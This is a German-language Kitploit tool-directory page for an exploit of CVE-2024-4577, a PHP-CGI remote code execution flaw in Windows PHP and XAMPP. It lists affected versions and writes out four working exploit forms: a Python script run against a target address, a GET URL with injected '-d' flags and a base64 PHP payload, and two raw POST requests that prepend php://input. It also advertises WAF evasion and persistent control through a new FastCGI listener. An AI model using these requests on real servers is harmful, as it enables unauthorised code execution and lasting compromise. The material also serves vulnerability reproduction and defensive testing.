Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-4577-PHP-RCE — [Schwachstellenreproduktion] Der weltweit erste EXP, der die PHP-Standardumgebung (XAMPP) für die CVE-2024-4577 PHP-CGI RCE Schwachstelle nutzt. | Kitploit
Tools/GitHubGitHub/xcanwin/cve-2024-4577-php-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsPayload-Entwicklung
GitHubxcanwin/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

[Schwachstellenreproduktion] Der weltweit erste EXP, der die PHP-Standardumgebung (XAMPP) für die CVE-2024-4577 PHP-CGI RCE Schwachstelle nutzt.

Repository anzeigen
16233vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-4577-PHP-RCE

Projektbeschreibung und Prinzip

  • Der erste weltweite Exploit für CVE-2024-4577 PHP-CGI RCE, der die Standard-PHP-Umgebung (XAMPP) nutzt.
  • The world's first CVE-2024-4577 PHP-CGI RCE exploit utilizing the default PHP environment. Sharing original exploit, supports SSRF, supports WAF bypass.
  • Ermöglicht RCE in der Standard-PHP-Umgebung. Prinzip: cgi.force_redirect + REDIRECT-STATUS.
  • Neuer, origineller EXP, der Szenarien mit WAF-Bypass unterstützt. Prinzip: Einrichtung eines FastCGI-Servers + Kommunikation über das FastCGI-Protokoll.
  • Neuer, origineller EXP, der SSRF-Szenarien unterstützt. Prinzip: data://-Protokoll + GET-Anfrage.

Vorteile von EXP 1

  • Ermöglicht RCE ohne allow_url_include, auto_prepend_file, auto_append_file. Kann beliebige Dateien und PHP-Dateien einbinden.
  • Die von WAFs häufig blockierten Schlüsselwörter allow_url_include, auto_prepend_file, auto_append_file werden nicht verwendet.
  • Die gesamte Kommunikation des FastCGI-Servers wird nicht von der WAF protokolliert.
  • Hört auf einem neuen Port, sodass eine dauerhafte Kontrolle des PHP-Servers unabhängig von Apache und PHP erreicht wird.

Schwachstellenübersicht

InformationInhalt
SchwachstellennamePHP RCE
SchwachstellennummerCVE-2024-4577
RisikostufeHoch
Schwachstellentyp

Betroffene Versionen

  • PHP Windows-Version 8.3.0 <= betroffene Version < 8.3.8
  • PHP Windows-Version 8.2.0 <= betroffene Version < 8.2.20
  • PHP Windows-Version 8.1.0 <= betroffene Version < 8.1.29
  • PHP Windows-Version betroffene Version == 8.0.x
  • PHP Windows-Version betroffene Version == 7.x
  • PHP Windows-Version betroffene Version == 5.x
  • XAMPP Windows-Version 8.2.0 <= betroffene Version <= 8.2.12
  • XAMPP Windows-Version 8.1.0 <= betroffene Version <= 8.1.25
  • XAMPP Windows-Version betroffene Version == 8.0.x
  • XAMPP Windows-Version betroffene Version == 7.x
  • XAMPP Windows-Version betroffene Version == 5.x

EXP 1

Kann für WAF-Bypass-Szenarien + Standard-Szenarien verwendet werden:

root@kitploit:~
python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort

Beispiel:

root@kitploit:~
python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80

EXP 2

Kann für SSRF-Szenarien + Standard-Szenarien verwendet werden:

root@kitploit:~
http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP 3

Kann für Standard-Szenarien verwendet werden:

root@kitploit:~
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost

<?php die("Te"."sT");?>

EXP 4

Kann für Standard-Szenarien verwendet werden:

root@kitploit:~
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN

<?php die("Te"."sT");?>

Reproduktion

  1. Serverumgebung:
root@kitploit:~
XAMPP Windows-Version 8.2.12
  1. XAMPP herunterladen und installieren:
root@kitploit:~
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1

Oder wählen Sie hier selbst betroffene Versionen aus: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
  1. Serverkonfiguration
root@kitploit:~
Keine Änderungen erforderlich, Standardkonfiguration beibehalten
  1. EXP auf Client-Seite verwenden
root@kitploit:~
Testen mit obigem EXP
  1. Überprüfung
root@kitploit:~
Beobachten Sie, ob die Zeichenkette "TesT" oder der Inhalt der system.ini-Datei des Servers zurückgegeben wird
Tool herunterladen
RCE
AusnutzungsschwierigkeitNiedrig